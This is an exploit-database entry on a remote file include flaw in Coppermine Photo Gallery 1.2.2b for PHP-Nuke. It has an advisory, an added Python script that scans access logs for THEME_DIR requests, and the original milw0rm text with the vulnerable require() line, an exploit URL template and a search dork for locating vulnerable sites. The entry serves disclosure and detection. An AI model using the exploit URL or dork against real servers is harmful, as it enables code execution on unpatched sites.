vendor: Coppermine Photo Gallery
by: Dr Max Virus
CVSS: N/A
Remote File Include
CWE: 98
Product Name: Coppermine Photo Gallery
Affected Version From: 1.0 RC3
Affected Version To: 1.2.2 b
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include Vulnerability

A vulnerability exists in Coppermine Photo Gallery v1.2.2b for PHPNUKE, which allows a remote attacker to include a file from a remote location. This is due to the application not properly sanitizing user-supplied input to the 'THEME_DIR' parameter in the 'themes.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Coppermine Photo Gallery.
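
A log check for the request pattern described above, as an added example (not part of the original advisory or of Coppermine's code): it scans web-server access logs for requests to Coppermine paths that set THEME_DIR in the query string and classifies the supplied value. The log lines are constructed, and the function names and the combined-log-format assumption are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Sep/2006:10:01:02 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://203.0.113.5/x HTTP/1.1" 200 512
192.0.2.11 - - [15/Sep/2006:10:02:00 +0000] "GET /modules.php?name=coppermine&file=thumbnails&album=3 HTTP/1.1" 200 9001
192.0.2.12 - - [15/Sep/2006:10:03:40 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=..%2F..%2Fetc HTTP/1.1" 200 77
192.0.2.13 - - [15/Sep/2006:10:04:10 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=themes/default HTTP/1.1" 404 0
"""

# client, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)


def classify(value):
    """Label a THEME_DIR value by how it would steer the require() path."""
    if SCHEME_RE.match(value):
        return "remote-url"      # include target on another host
    if ".." in value or value.startswith("/"):
        return "local-path"      # include target elsewhere on the local disk
    return "param-set"           # variable set from the request at all


def find_theme_dir_requests(log_text):
    """Return one finding per THEME_DIR value seen on a Coppermine path."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if "coppermine" not in url.path.lower():
            continue
        # PHP variable names are case-sensitive, so match the exact name.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("THEME_DIR", []):
            hits.append({"client": client, "path": url.path,
                         "status": int(status), "kind": classify(value),
                         "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_theme_dir_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a value sent in a POST body would not show up in this check.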

Exploit-DB raw data:

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code: require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]